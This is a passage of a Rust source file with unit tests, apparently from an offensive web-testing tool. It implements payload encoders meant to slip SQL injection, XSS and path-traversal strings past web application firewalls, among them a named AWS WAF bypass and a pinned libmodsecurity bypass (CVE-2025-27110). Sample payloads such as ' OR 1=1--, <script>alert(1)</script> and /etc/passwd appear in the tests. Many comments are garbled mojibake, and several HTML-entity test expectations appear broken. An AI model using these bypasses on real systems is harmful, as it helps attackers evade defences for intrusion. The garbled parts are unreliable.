866 out.push_str("''");
867 } else {
868 out.push_str(&literal);
869 }
870 out.push('\'');
871 continue;
872 }
873 // Single-character split: each char of the literal becomes its
874 // own `'c'` quoted token, joined by single spaces. ANSI SQL-92
875 // ยง5.3 concatenates them at parse time. Idempotent: each output
876 // sub-literal has length 1 (below the threshold) so a second
877 // pass sees only short literals and produces identical output.
878 //
879 // Escaped-quote handling: if the source literal contained a
880 // SQL `''` escape it lives in `literal` as a single `'` char.
881 // The shattered single-char literal for that position emits
882 // `''''` (four-quote form: opening quote, escaped quote, escaped
883 // quote, closing quote) so the database reassembles the
884 // original `'` content. Idempotency holds because `''''` parses
885 // as a length-1 literal containing `'` on the next pass.
886 let mut first = true;
887 for c in lit_chars {
888 if !first {
889 out.push(' ');
890 }
891 first = false;
892 out.push('\'');
893 if c == '\'' {
894 out.push_str("''");
895 } else {
896 out.push(c);
897 }
898 out.push('\'');
899 }
900 }
901 out
902}
903
/// Punctuation homoglyph substitution: replaces a fixed set of ASCII
/// punctuation characters with look-alike non-ASCII code points and leaves
/// everything else untouched.
///
/// | input | output                                  |
/// |-------|-----------------------------------------|
/// | `<`   | U+FF1C FULLWIDTH LESS-THAN SIGN         |
/// | `>`   | U+FF1E FULLWIDTH GREATER-THAN SIGN      |
/// | `=`   | U+FF1D FULLWIDTH EQUALS SIGN            |
/// | `(`   | U+FF08 FULLWIDTH LEFT PARENTHESIS       |
/// | `)`   | U+FF09 FULLWIDTH RIGHT PARENTHESIS      |
/// | `;`   | U+FF1B FULLWIDTH SEMICOLON              |
/// | `-`   | U+2010 HYPHEN                           |
/// | `/`   | U+2215 DIVISION SLASH                   |
///
/// **Bypass mechanism**: a filter matching the ASCII bytes sees different
/// bytes. The payload only stays functional if the receiving side maps the
/// substitutes back (for example through compatibility normalisation) or
/// accepts them as-is; that is target-specific and not checked here.
///
/// The quote characters `'` and `"` are deliberately NOT substituted:
/// payloads rely on them to terminate the host string literal, and typographic
/// quotes are not expected to be treated as delimiters by the receiving parser.
#[must_use]
pub fn homoglyph_encode(payload: &str) -> String {
    payload
        .chars()
        .map(|symbol| match symbol {
            // Comparison operators.
            '<' => '\u{FF1C}',
            '>' => '\u{FF1E}',
            '=' => '\u{FF1D}',
            // Grouping and statement punctuation.
            '(' => '\u{FF08}',
            ')' => '\u{FF09}',
            ';' => '\u{FF1B}',
            '-' => '\u{2010}',
            '/' => '\u{2215}',
            // Letters, digits, quotes and anything else pass through.
            other => other,
        })
        .collect()
}
949
/// Inserts `invisible_char` after every ASCII letter or digit of `payload`
/// that is followed by at least one more character.
///
/// Nothing is inserted after the final character of the payload, and nothing
/// is inserted after characters that are not ASCII alphanumerics. For example,
/// with U+200B as `invisible_char`, `ab1` becomes `a<U+200B>b<U+200B>1`.
///
/// The same character is used at every insertion point; callers that want to
/// vary it can pick a value from [`ZERO_WIDTH_DEFAULTS`] per call.
///
/// **Bypass mechanism**: the output differs byte-wise from the input, so a
/// filter matching a contiguous keyword misses it. Whether the receiving
/// parser ignores the inserted character is target-specific and is not
/// checked here.
#[must_use]
pub fn zero_width_inject(payload: &str, invisible_char: char) -> String {
    let mut result = String::with_capacity(payload.len() * 2);
    for (offset, ch) in payload.char_indices() {
        result.push(ch);
        // A successor exists when this character does not end the string.
        let has_successor = offset + ch.len_utf8() < payload.len();
        if has_successor && ch.is_ascii_alphanumeric() {
            result.push(invisible_char);
        }
    }
    result
}
980
/// Suggested invisible characters for zero-width injection, in order:
/// U+200B ZERO WIDTH SPACE, U+200C ZERO WIDTH NON-JOINER,
/// U+200D ZERO WIDTH JOINER, U+FEFF ZERO WIDTH NO-BREAK SPACE (byte order
/// mark) and U+034F COMBINING GRAPHEME JOINER.
///
/// This is a plain table of candidates; choosing an element (and rotating
/// between them, if desired) is left to the caller.
pub const ZERO_WIDTH_DEFAULTS: [char; 5] =
    ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}'];
985
/// Appends the combining character `mark` after every ASCII letter of
/// `payload`, including a letter in final position. Digits, punctuation
/// and non-ASCII characters are copied without a mark.
///
/// For example, with U+0308 COMBINING DIAERESIS as `mark`, `ab1` becomes
/// `a<U+0308>b<U+0308>1`.
///
/// **Bypass mechanism**: a filter matching the contiguous ASCII keyword sees
/// a different byte sequence. The payload is only live if the receiving side
/// removes or ignores the marks.
///
/// NOTE(review): Unicode NFC composes a base letter with a following mark
/// where a precomposed form exists; it does not strip marks. Confirm which
/// backend transformation is expected to restore the plain keyword.
///
/// Typical choices for `mark` are U+0300, U+0301, U+0308, U+0327, or
/// U+034F COMBINING GRAPHEME JOINER when no visible diacritic is wanted.
#[must_use]
pub fn combining_mark_inject(payload: &str, mark: char) -> String {
    let seed = String::with_capacity(payload.len() * 3);
    payload.chars().fold(seed, |mut marked, letter| {
        marked.push(letter);
        if letter.is_ascii_alphabetic() {
            marked.push(mark);
        }
        marked
    })
}
1008
/// Cross-script letter substitution: replaces selected ASCII letters with
/// visually similar Cyrillic or Greek letters.
///
/// Unlike [`homoglyph_encode`], which only touches punctuation, this encoder
/// rewrites the letters themselves so that a filter matching an ASCII
/// keyword sees different code points. Letters without an entry in the table
/// below, digits and punctuation are copied unchanged.
///
/// The payload stays functional only if the receiving side maps the
/// look-alikes back to ASCII (for instance through a lossy character-set
/// conversion); that is target-specific and not checked here.
#[must_use]
pub fn script_homoglyph_encode(payload: &str) -> String {
    /// Returns the look-alike for `letter`, or `letter` itself if none is defined.
    fn lookalike(letter: char) -> char {
        match letter {
            // Cyrillic lowercase.
            'a' => '\u{0430}', // CYRILLIC SMALL LETTER A
            'c' => '\u{0441}', // CYRILLIC SMALL LETTER ES
            'e' => '\u{0435}', // CYRILLIC SMALL LETTER IE
            'o' => '\u{043E}', // CYRILLIC SMALL LETTER O
            'p' => '\u{0440}', // CYRILLIC SMALL LETTER ER
            's' => '\u{0455}', // CYRILLIC SMALL LETTER DZE
            'x' => '\u{0445}', // CYRILLIC SMALL LETTER HA
            'y' => '\u{0443}', // CYRILLIC SMALL LETTER U
            // Cyrillic uppercase.
            'A' => '\u{0410}', // CYRILLIC CAPITAL LETTER A
            'B' => '\u{0412}', // CYRILLIC CAPITAL LETTER VE
            'C' => '\u{0421}', // CYRILLIC CAPITAL LETTER ES
            'E' => '\u{0415}', // CYRILLIC CAPITAL LETTER IE
            'H' => '\u{041D}', // CYRILLIC CAPITAL LETTER EN
            'K' => '\u{041A}', // CYRILLIC CAPITAL LETTER KA
            'M' => '\u{041C}', // CYRILLIC CAPITAL LETTER EM
            'O' => '\u{041E}', // CYRILLIC CAPITAL LETTER O
            'P' => '\u{0420}', // CYRILLIC CAPITAL LETTER ER
            'T' => '\u{0422}', // CYRILLIC CAPITAL LETTER TE
            'X' => '\u{0425}', // CYRILLIC CAPITAL LETTER HA
            // Greek lowercase for letters with no Cyrillic entry above.
            'n' => '\u{03B7}', // GREEK SMALL LETTER ETA
            'v' => '\u{03BD}', // GREEK SMALL LETTER NU
            unmapped => unmapped,
        }
    }

    payload.chars().map(lookalike).collect()
}
1061
/// Turkish-i substitution: replaces `i` with U+0131 LATIN SMALL LETTER
/// DOTLESS I and `I` with U+0130 LATIN CAPITAL LETTER I WITH DOT ABOVE.
/// All other characters are copied unchanged.
///
/// **Bypass mechanism**: ASCII-only case folding leaves both substitutes
/// untouched, so a filter that lowercases with an ASCII routine and then
/// looks for e.g. `script` does not match `scr<U+0131>pt`. The payload is
/// only live if a later stage on the receiving side folds the substitutes
/// back to `i`/`I` (for example through locale-aware or Unicode case
/// mapping).
///
/// NOTE(review): whether a given browser or backend performs that folding
/// is target-specific; confirm before relying on it.
#[must_use]
pub fn turkish_i_encode(payload: &str) -> String {
    let mut swapped = String::with_capacity(payload.len());
    for letter in payload.chars() {
        let replacement = if letter == 'i' {
            '\u{0131}'
        } else if letter == 'I' {
            '\u{0130}'
        } else {
            letter
        };
        swapped.push(replacement);
    }
    swapped
}
1083
/// Sharp-s substitution: replaces both `s` and `S` with U+00DF LATIN SMALL
/// LETTER SHARP S. All other characters are copied unchanged.
///
/// **Bypass mechanism**: a filter matching the ASCII keyword sees a
/// different byte sequence. The payload is only live if the receiving side
/// transforms the sharp s back into something the target grammar accepts.
///
/// NOTE(review): under Unicode full case folding U+00DF folds to the two
/// letters `ss`, not to a single `s`; confirm which backend transformation
/// is expected to restore the keyword. Applicability is narrower than
/// [`turkish_i_encode`].
#[must_use]
pub fn sharp_s_encode(payload: &str) -> String {
    const SHARP_S: char = '\u{00DF}';

    let mut replaced = String::with_capacity(payload.len());
    for letter in payload.chars() {
        if matches!(letter, 's' | 'S') {
            replaced.push(SHARP_S);
        } else {
            replaced.push(letter);
        }
    }
    replaced
}
1102
1103/// AWS WAF JSON-pointer escape โ encode every char of `key` as
1104/// `\uXXXX` so the WAF's JSON-pointer rule (e.g. `/id` literal-match)
1105/// misses, while the backend JSON parser decodes the escape and
1106/// routes the value to the original field.
1107///
1108/// Returns the JSON fragment `{"<key-escaped>": "<value>"}` ready to
1109/// drop into a request body. Sicuranext 2024 confirmed bypass.
1110#[must_use]
1111pub fn json_key_unicode_escape(key: &str, value: &str) -> String {
1112 let mut escaped_key = String::with_capacity(key.len() * 6);
1113 for ch in key.chars() {
1114 let cp = ch as u32;
1115 if cp <= 0xFFFF {
1116 escaped_key.push_str(&format!("\\u{:04x}", cp));
1117 } else {
1118 // Surrogate pair for non-BMP codepoints.
1119 let v = cp - 0x10000;
1120 let hi = 0xD800 + (v >> 10);
1121 let lo = 0xDC00 + (v & 0x3FF);
1122 escaped_key.push_str(&format!("\\u{:04x}\\u{:04x}", hi, lo));
1123 }
1124 }
1125 // Value goes through JSON-safe encode (the existing helper).
1126 let value_json = serde_json::to_string(value).unwrap_or_else(|_| format!("\"{value}\""));
1127 format!("{{\"{escaped_key}\": {value_json}}}")
1128}
1129
/// Rewrites the path separators and dots of `path` as percent-encoded
/// overlong UTF-8 sequences, for path-traversal payloads.
///
/// `.`, `/` and `\` are replaced; every other character is copied as-is
/// (no percent-encoding is applied to it).
///
/// `width` selects the length of the overlong form:
///
/// | `width`      | `.`            | `/`            | `\`            |
/// |--------------|----------------|----------------|----------------|
/// | `2`          | `%c0%ae`       | `%c0%af`       | `%c1%9c`       |
/// | `3`          | `%e0%80%ae`    | `%e0%80%af`    | `%e0%81%9c`    |
/// | anything else| `%f0%80%80%ae` | `%f0%80%80%af` | `%f0%80%81%9c` |
///
/// Any `width` other than 2 or 3 (including 4) selects the 4-byte form.
///
/// **Bypass mechanism**: a strict UTF-8 decoder rejects overlong sequences
/// as malformed, but a lenient decoder maps them back to the ASCII
/// character. A filter that does not decode them never sees `../`, while a
/// lenient backend does.
#[must_use]
pub fn overlong_utf8_path(path: &str, width: u8) -> String {
    // Each sequence spreads the 7-bit ASCII value over a longer UTF-8 layout.
    // `.` (0x2E) and `/` (0x2F) fit in the six payload bits of the final
    // continuation byte. `\` (0x5C) has bit 6 set, so that bit lands in the
    // preceding byte: C1 9C, E0 81 9C, F0 80 81 9C.
    let (dot, slash, backslash) = match width {
        2 => ("%c0%ae", "%c0%af", "%c1%9c"),
        3 => ("%e0%80%ae", "%e0%80%af", "%e0%81%9c"),
        _ => ("%f0%80%80%ae", "%f0%80%80%af", "%f0%80%81%9c"),
    };

    // All three replacements for a given width have the same length, which
    // bounds the growth per input byte.
    let mut out = String::with_capacity(path.len() * slash.len());
    for c in path.chars() {
        match c {
            '.' => out.push_str(dot),
            '/' => out.push_str(slash),
            '\\' => out.push_str(backslash),
            other => out.push(other),
        }
    }
    out
}
1174
/// Wraps `reversed_keyword` in a bidirectional override: U+202E
/// RIGHT-TO-LEFT OVERRIDE is placed before it and U+202C POP DIRECTIONAL
/// FORMATTING after it. The keyword itself is copied unchanged, so the
/// caller is expected to pass it already reversed.
///
/// A scanner reading the bytes in order sees the reversed text (for example
/// `tceleS`), while a bidi-aware viewer displays it in reading order
/// (`Select`). This is the "Trojan Source" class of trick (CVE-2021-42574).
///
/// **Narrow direct bypass surface**: the override characters remain in the
/// payload, so it is mainly useful for confusing logs, dashboards and
/// rule-auditing tools. It only becomes executable if something on the
/// receiving side strips the bidi controls and re-reverses the text.
/// Confirm per target.
#[must_use]
pub fn bidi_inject(reversed_keyword: &str) -> String {
    const RIGHT_TO_LEFT_OVERRIDE: char = '\u{202E}';
    const POP_DIRECTIONAL_FORMATTING: char = '\u{202C}';

    let framing = RIGHT_TO_LEFT_OVERRIDE.len_utf8() + POP_DIRECTIONAL_FORMATTING.len_utf8();
    let mut wrapped = String::with_capacity(reversed_keyword.len() + framing);
    wrapped.push(RIGHT_TO_LEFT_OVERRIDE);
    wrapped.push_str(reversed_keyword);
    wrapped.push(POP_DIRECTIONAL_FORMATTING);
    wrapped
}
1190
1191#[cfg(test)]
1192mod tests {
1193 use super::*;
1194
1195 #[test]
1196 fn unicode_encode_basic() {
1197 assert_eq!(unicode_encode("A"), "\\u0041");
1198 assert_eq!(unicode_encode("AB"), "\\u0041\\u0042");
1199 }
1200
1201 #[test]
1202 fn json_unicode_alnum_keyword_split() {
1203 // "UNION" becomes 5 `\uXXXX` sequences, ASCII bytes nowhere.
1204 let out = json_unicode_alnum("UNION");
1205 assert_eq!(out, "\\u0055\\u004E\\u0049\\u004F\\u004E");
1206 assert!(!out.contains("UNION"));
1207 }
1208
1209 // โโ json_unicode_full / mixed_case tests โโโโโโโโโโโโโโโโโโโโโโโโโโ
1210
1211 #[test]
1212 fn json_unicode_full_escapes_every_char() {
1213 let out = json_unicode_full("a' b");
1214 // Every char including space and quote escaped.
1215 assert!(out.contains("\\u0061")); // a
1216 assert!(out.contains("\\u0027")); // '
1217 assert!(out.contains("\\u0020")); // space
1218 assert!(out.contains("\\u0062")); // b
1219 // No literal input char remains as plain (input letters 'a' and 'b'
1220 // appear only inside hex of escapes; the literal 'a' standalone
1221 // boundary should NOT be present as a runnable token).
1222 // Simpler check: every output codepoint is either backslash, 'u',
1223 // or hex digit.
1224 for c in out.chars() {
1225 assert!(
1226 c == '\\' || c == 'u' || c.is_ascii_hexdigit(),
1227 "unexpected raw char {c:?} in {out}"
1228 );
1229 }
1230 }
1231
1232 #[test]
1233 fn json_unicode_full_idempotent_on_pre_escaped() {
1234 let already = "\\u0073elect";
1235 let out = json_unicode_full(already);
1236 // Pre-existing s stays unchanged; "elect" gets escaped.
1237 assert!(out.starts_with("\\u0073"));
1238 assert!(out.contains("\\u0065")); // e
1239 }
1240
1241 #[test]
1242 fn json_unicode_full_handles_non_bmp_via_surrogate_pair() {
1243 // U+1F600 GRINNING FACE โ ๐
1244 let out = json_unicode_full("๐");
1245 assert_eq!(out, "\\uD83D\\uDE00");
1246 }
1247
1248 #[test]
1249 fn json_unicode_mixed_case_alternates_forms() {
1250 let out = json_unicode_mixed_case("abcd");
1251 // 4 chars โ 4 different forms.
1252 assert!(out.contains("\\u0061")); // i=0 lowercase
1253 assert!(out.contains("\\U0062")); // i=1 uppercase U
1254 assert!(out.contains("\\u0063")); // i=2 lower u, upper hex
1255 assert!(out.contains("\\U0064")); // i=3 upper U, lower hex
1256 }
1257
1258 #[test]
1259 fn json_unicode_alnum_leaves_punctuation() {
1260 // SQLi shape: keywords escaped, structural delimiters bare.
1261 let out = json_unicode_alnum("' OR 1=1--");
1262 assert_eq!(out, "' \\u004F\\u0052 \\u0031=\\u0031--");
1263 let out2 = json_unicode_alnum("AB CD");
1264 assert_eq!(out2, "\\u0041\\u0042 \\u0043\\u0044");
1265 }
1266
1267 #[test]
1268 fn json_unicode_alnum_idempotent_skip_pass() {
1269 // Second pass MUST be a no-op โ already-escaped \uXXXX
1270 // sequences are detected and passed through.
1271 let once = json_unicode_alnum("UNION SELECT");
1272 let twice = json_unicode_alnum(&once);
1273 assert_eq!(once, twice, "tamper must stabilize");
1274 }
1275
1276 #[test]
1277 fn json_unicode_alnum_preserves_quote_unencoded() {
1278 // ' is U+0027 โ NOT alphanumeric, so must stay literal.
1279 let out = json_unicode_alnum("'");
1280 assert_eq!(out, "'");
1281 }
1282
1283 #[test]
1284 fn json_unicode_alnum_xss_keyword_split() {
1285 // <script>alert โ `<`, `>`, `(`, `)` stay bare; letters/digits escape.
1286 let out = json_unicode_alnum("<script>alert(1)</script>");
1287 assert!(!out.contains("script"));
1288 assert!(!out.contains("alert"));
1289 assert!(out.contains('<'));
1290 assert!(out.contains('>'));
1291 assert!(out.contains('('));
1292 }
1293
1294 #[test]
1295 fn json_unicode_alnum_empty_input() {
1296 assert_eq!(json_unicode_alnum(""), "");
1297 }
1298
1299 #[test]
1300 fn sql_adjacent_string_concat_basic() {
1301 // 'admin' (len 5) โ 5 single-char adjacent literals.
1302 assert_eq!(sql_adjacent_string_concat("'admin'"), "'a' 'd' 'm' 'i' 'n'");
1303 }
1304
1305 #[test]
1306 fn sql_adjacent_string_concat_short_literal_unchanged() {
1307 // Length-1 literals must pass through (already minimum).
1308 assert_eq!(sql_adjacent_string_concat("'a'"), "'a'");
1309 assert_eq!(sql_adjacent_string_concat("''"), "''");
1310 }
1311
1312 #[test]
1313 fn sql_adjacent_string_concat_idempotent() {
1314 // Well-formed (balanced quotes) payload โ the literals 'admin'
1315 // and 'root' each shatter into single-char adjacent literals.
1316 let once = sql_adjacent_string_concat("WHERE x='admin' OR y='root'");
1317 let twice = sql_adjacent_string_concat(&once);
1318 assert_eq!(once, twice, "tamper must stabilize on second pass");
1319 assert!(once.contains("'a' 'd' 'm' 'i' 'n'"));
1320 assert!(once.contains("'r' 'o' 'o' 't'"));
1321 }
1322
1323 #[test]
1324 fn sql_adjacent_string_concat_preserves_outside_literal() {
1325 // No quoted literal in payload โ must be a no-op.
1326 assert_eq!(sql_adjacent_string_concat("1 OR 1=1--"), "1 OR 1=1--");
1327 }
1328
1329 #[test]
1330 fn sql_adjacent_string_concat_handles_escaped_quote() {
1331 // SQL '' escape inside a literal: the position holding `'` is
1332 // emitted as the four-quote form `''''` โ opening, escaped pair,
1333 // closing โ which parses as a length-1 literal containing `'`.
1334 // The database reassembles "O" + "'" + "B" + "r" + "i" + "e" + "n".
1335 let out = sql_adjacent_string_concat("'O''Brien'");
1336 assert_eq!(out, "'O' '''' 'B' 'r' 'i' 'e' 'n'");
1337 }
1338
1339 #[test]
1340 fn sql_adjacent_string_concat_escaped_quote_idempotent() {
1341 // Second pass: the `''''` token is a length-1 literal containing
1342 // `'` (below split threshold). It must pass through unchanged
1343 // (via the length-1 branch with the escaped-quote sub-case).
1344 let once = sql_adjacent_string_concat("'O''Brien'");
1345 let twice = sql_adjacent_string_concat(&once);
1346 assert_eq!(once, twice);
1347 }
1348
1349 #[test]
1350 fn sql_adjacent_string_concat_single_quote_literal_emits_four_quotes() {
1351 // A literal of length 1 containing only `'` (source: `''''`)
1352 // must output the same `''''` (passthrough form).
1353 let out = sql_adjacent_string_concat("''''");
1354 assert_eq!(out, "''''");
1355 }
1356
1357 #[test]
1358 fn sql_adjacent_string_concat_its_a_test_shatters_correctly() {
1359 // The dogfood agent's B5 reproducer.
1360 let out = sql_adjacent_string_concat("'it''s a test'");
1361 // Literal content: "it's a test" (11 chars). Each char emits
1362 // its own single-char literal; the `'` becomes `''''`.
1363 assert_eq!(out, "'i' 't' '''' 's' ' ' 'a' ' ' 't' 'e' 's' 't'");
1364 }
1365
1366 #[test]
1367 fn sql_adjacent_string_concat_unterminated_quote_passthrough() {
1368 // Defensive: an unclosed quote must not crash and must not
1369 // wrap-then-mistakenly-close. Output should preserve the bytes
1370 // verbatim except for the unmatched-quote tail.
1371 let out = sql_adjacent_string_concat("'unclosed");
1372 assert_eq!(out, "'unclosed");
1373 }
1374
1375 #[test]
1376 fn sql_adjacent_string_concat_path_literal_split() {
1377 // /etc/passwd path literal is a high-fidelity LFI fingerprint.
1378 // 11 chars โ 11 single-char literals; the byte sequence
1379 // `/etc/passwd` no longer appears contiguously.
1380 let out = sql_adjacent_string_concat("'/etc/passwd'");
1381 assert_eq!(out, "'/' 'e' 't' 'c' '/' 'p' 'a' 's' 's' 'w' 'd'");
1382 assert!(!out.contains("/etc/passwd"));
1383 }
1384
1385 #[test]
1386 fn json_unicode_alnum_unicode_input_passes_through() {
1387 // Non-ASCII chars (ๆฅๆฌ่ช) are NOT ascii_alphanumeric โ left bare.
1388 // This keeps the function focused on the keyword-bypass mission.
1389 let out = json_unicode_alnum("ๆฅๆฌ");
1390 assert_eq!(out, "ๆฅๆฌ");
1391 }
1392
1393 #[test]
1394 fn unicode_encode_special_chars() {
1395 let encoded = unicode_encode("' OR 1=1--");
1396 assert!(encoded.contains("\\u0027")); // '
1397 assert!(encoded.contains("\\u003D")); // =
1398 }
1399
1400 #[test]
1401 fn unicode_encode_unicode() {
1402 let encoded = unicode_encode("ๆฅๆฌ่ช");
1403 assert_eq!(encoded, "\\u65E5\\u672C\\u8A9E");
1404 }
1405
1406 #[test]
1407 fn iis_unicode_encode_basic() {
1408 assert_eq!(iis_unicode_encode("A"), "%u0041");
1409 assert_eq!(iis_unicode_encode("AB"), "%u0041%u0042");
1410 }
1411
1412 #[test]
1413 fn iis_unicode_encode_bmp_only_for_3byte_utf8() {
1414 // U+65E5 (ๆฅ) is BMP โ emits as a single %uXXXX, no
1415 // surrogate. This is the existing happy path.
1416 assert_eq!(iis_unicode_encode("ๆฅ"), "%u65E5");
1417 }
1418
1419 #[test]
1420 fn iis_unicode_encode_non_bmp_emits_surrogate_pair() {
1421 // U+1F600 (๐) is supplementary plane. Pre-fix this emitted
1422 // `%u1F600` (5 hex digits โ invalid IIS %u, silently
1423 // unencodable, bypass-rate killer). Post-fix it MUST emit a
1424 // UTF-16 surrogate pair `%uD83D%uDE00`.
1425 assert_eq!(iis_unicode_encode("๐"), "%uD83D%uDE00");
1426 }
1427
1428 #[test]
1429 fn iis_unicode_encode_mixed_bmp_and_non_bmp() {
1430 // Adversarial: a mix of plain ASCII + BMP + supplementary
1431 // must produce exactly one %uXXXX or %uXXXX%uXXXX per char.
1432 // No 5-digit %u sequences anywhere โ pin the regression.
1433 let out = iis_unicode_encode("Aๆฅ๐");
1434 assert_eq!(out, "%u0041%u65E5%uD83D%uDE00");
1435 // Anti-regression: scan for any 5-hex-digit %u sequence.
1436 // The fix would silently regress if someone widened the
1437 // format string to %u{:05X} thinking it "supports" non-BMP.
1438 for hex_run in out.split("%u").skip(1) {
1439 let hex_part: String = hex_run
1440 .chars()
1441 .take_while(|c| c.is_ascii_hexdigit())
1442 .collect();
1443 assert!(
1444 hex_part.len() == 4,
1445 "every %u sequence must be exactly 4 hex digits (IIS spec); \
1446 got {hex_part:?} in output {out:?}"
1447 );
1448 }
1449 }
1450
1451 #[test]
1452 fn json_encode_basic() {
1453 // F67: encoder produces escaped CONTENT only (no
1454 // surrounding double-quotes). Callers inject into an
1455 // existing JSON string field; wrapping our own quotes
1456 // would break the host JSON document.
1457 assert_eq!(json_string_encode("A"), "A");
1458 assert_eq!(json_string_encode("A\\B"), "A\\\\B");
1459 assert_eq!(json_string_encode("A\"B"), "A\\\"B");
1460 assert_eq!(json_string_encode("A\nB"), "A\\nB");
1461 }
1462
1463 #[test]
1464 fn json_encode_control_chars() {
1465 assert_eq!(json_string_encode("\x01"), "\\u0001");
1466 }
1467
1468 #[test]
1469 fn html_entity_encode_basic() {
1470 assert_eq!(html_entity_encode("A"), "A");
1471 assert_eq!(html_entity_encode("AB"), "AB");
1472 }
1473
1474 #[test]
1475 fn html_entity_encode_special_chars() {
1476 let encoded = html_entity_encode("<script>");
1477 assert_eq!(encoded, "<script>");
1478 }
1479
1480 #[test]
1481 fn html_entity_decimal_encode_basic() {
1482 assert_eq!(html_entity_decimal_encode("A"), "A");
1483 assert_eq!(html_entity_decimal_encode("<"), "<");
1484 }
1485
1486 #[test]
1487 fn html_entity_encode_empty() {
1488 assert_eq!(html_entity_encode(""), "");
1489 }
1490
1491 // โโ html_entity_zero_pad tests (CVE-2025-27110) โโโโโโโโโโโโโโโโโโโโ
1492
1493 #[test]
1494 fn html_entity_zero_pad_hex_width_4_matches_cve_advisory_example() {
1495 // Pinned to the exact form the CVE-2025-27110 advisory uses
1496 // as its smoking gun: `<` for `<`. If this drifts
1497 // (someone "tidies" the formatter), every libmodsecurity
1498 // 3.0.13 bypass stops working.
1499 assert_eq!(html_entity_zero_pad("<", 4, true), "<");
1500 }
1501
1502 #[test]
1503 fn html_entity_zero_pad_decimal_width_4_matches_cve_advisory_example() {
1504 // The decimal counterpart from the same advisory: `<`
1505 // for `<`. Same bypass mechanism, different radix.
1506 assert_eq!(html_entity_zero_pad("<", 4, false), "<");
1507 }
1508
1509 #[test]
1510 fn html_entity_zero_pad_width_1_is_unpadded() {
1511 // width=1 means "pad to at least 1" which for any code point
1512 // > 0 is a no-op. Anti-rig: the function must not insert
1513 // leading zeros at width=1, otherwise it becomes equivalent
1514 // to width=2 and the "no-padding" form is unreachable.
1515 assert_eq!(html_entity_zero_pad("A", 1, true), "A");
1516 assert_eq!(html_entity_zero_pad("A", 1, false), "A");
1517 }
1518
1519 #[test]
1520 fn html_entity_zero_pad_width_0_is_coerced_to_1() {
1521 // Boundary: pad=0 is a contract-violating input. We coerce
1522 // to 1 (the "no-padding" form) rather than emit `&#x;` (a
1523 // malformed entity). Catches a future refactor that uses
1524 // `pad.min(16)` only and forgets the `.max(1)` lower bound.
1525 assert_eq!(html_entity_zero_pad("A", 0, true), "A");
1526 }
1527
1528 #[test]
1529 fn html_entity_zero_pad_width_above_cap_is_clamped() {
1530 // Boundary: pad=100 is an anti-DoS concern. We clamp at 16.
1531 // The result for 'A' (0x41 = 2 hex digits) padded to 16 is
1532 // `A` โ 14 leading zeros. Pin the exact
1533 // byte sequence so a future change to the cap is visible
1534 // (and intentional).
1535 assert_eq!(html_entity_zero_pad("A", 100, true), "A");
1536 }
1537
1538 #[test]
1539 fn html_entity_zero_pad_empty_input_produces_empty_output() {
1540 // Anti-rig: empty input must produce empty output (the
1541 // identity element of concatenation). A naive `for ch in
1542 // ""` does the right thing today; this test pins that the
1543 // result is exactly "" rather than e.g. "&#x;" from a
1544 // single dangling write.
1545 assert_eq!(html_entity_zero_pad("", 4, true), "");
1546 assert_eq!(html_entity_zero_pad("", 4, false), "");
1547 }
1548
1549 #[test]
1550 fn html_entity_zero_pad_xss_payload_round_trip_browser_equivalent() {
1551 // CVE-2025-27110 exploit-path smoke: a `<script>` payload
1552 // routed through width-4 hex must produce the exact byte
1553 // sequence that the CVE write-up shows as bypassing
1554 // libmodsecurity 3.0.13. If this changes, we're not
1555 // shipping the documented bypass anymore.
1556 let out = html_entity_zero_pad("<script>", 4, true);
1557 assert_eq!(
1558 out,
1559 "<script>"
1560 );
1561 }
1562
1563 // โโ html_entity_variants tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1564
1565 #[test]
1566 fn html_entity_variants_cycles_four_forms() {
1567 // 'A'=0x41=65 โ verify each of the four rotation slots
1568 let encoded = html_entity_variants("AAAA");
1569 assert_eq!(encoded, "AAAA");
1570 }
1571
1572 #[test]
1573 fn html_entity_variants_continues_rotation() {
1574 // 'A'=65 โ fifth char returns to slot 0 (lowercase-x hex)
1575 let encoded = html_entity_variants("AAAAA");
1576 assert_eq!(encoded, "AAAAA");
1577 }
1578
1579 #[test]
1580 fn html_entity_variants_empty() {
1581 assert_eq!(html_entity_variants(""), "");
1582 }
1583
1584 #[test]
1585 fn html_entity_variants_xss_payload() {
1586 // '<' = 0x3C = 60, 's'=0x73=115, '>'=0x3E=62
1587 // First three chars use slots 0, 1, 2:
1588 let encoded = html_entity_variants("<s>");
1589 assert_eq!(encoded, "<s>");
1590 }
1591
1592 #[test]
1593 fn html_entity_variants_unicode_codepoint() {
1594 // emoji U+1F600 ('๐') โ codepoint 128512 โ exercises higher-bit chars
1595 let encoded = html_entity_variants("\u{1F600}");
1596 assert_eq!(encoded, "😀");
1597 }
1598
1599 #[test]
1600 fn html_entity_variants_distinct_from_canonical() {
1601 // 4+ char payload MUST differ from canonical html_entity_encode
1602 // (canonical is always lowercase-x hex with semicolon)
1603 let canon = html_entity_encode("ABCD");
1604 let var = html_entity_variants("ABCD");
1605 assert_ne!(canon, var);
1606 }
1607
1608 #[test]
1609 fn html_entity_variants_deterministic() {
1610 // Same input โ same output (no randomness; rotation is by index)
1611 assert_eq!(
1612 html_entity_variants("hello world"),
1613 html_entity_variants("hello world")
1614 );
1615 }
1616
1617 // โโ math_bold_encode tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1618
1619 #[test]
1620 fn math_bold_encode_uppercase() {
1621 assert_eq!(math_bold_encode("A"), "\u{1D400}"); // ๐
1622 assert_eq!(math_bold_encode("Z"), "\u{1D419}"); // ๐
1623 }
1624
1625 #[test]
1626 fn math_bold_encode_lowercase() {
1627 assert_eq!(math_bold_encode("a"), "\u{1D41A}"); // ๐
1628 assert_eq!(math_bold_encode("z"), "\u{1D433}"); // ๐ณ
1629 }
1630
1631 #[test]
1632 fn math_bold_encode_digits() {
1633 assert_eq!(math_bold_encode("0"), "\u{1D7CE}"); // ๐
1634 assert_eq!(math_bold_encode("9"), "\u{1D7D7}"); // ๐
1635 }
1636
1637 #[test]
1638 fn math_bold_encode_sql_keyword() {
1639 // SELECT โ ๐๐๐๐๐๐
1640 let encoded = math_bold_encode("SELECT");
1641 assert_eq!(encoded.chars().count(), 6);
1642 for ch in encoded.chars() {
1643 assert!(
1644 (0x1D400..=0x1D419).contains(&(ch as u32)),
1645 "expected math bold capital, got U+{:04X}",
1646 ch as u32
1647 );
1648 }
1649 }
1650
1651 #[test]
1652 fn math_bold_encode_preserves_punctuation() {
1653 // ' OR 1=1-- โ only letters/digits transform; punctuation stays
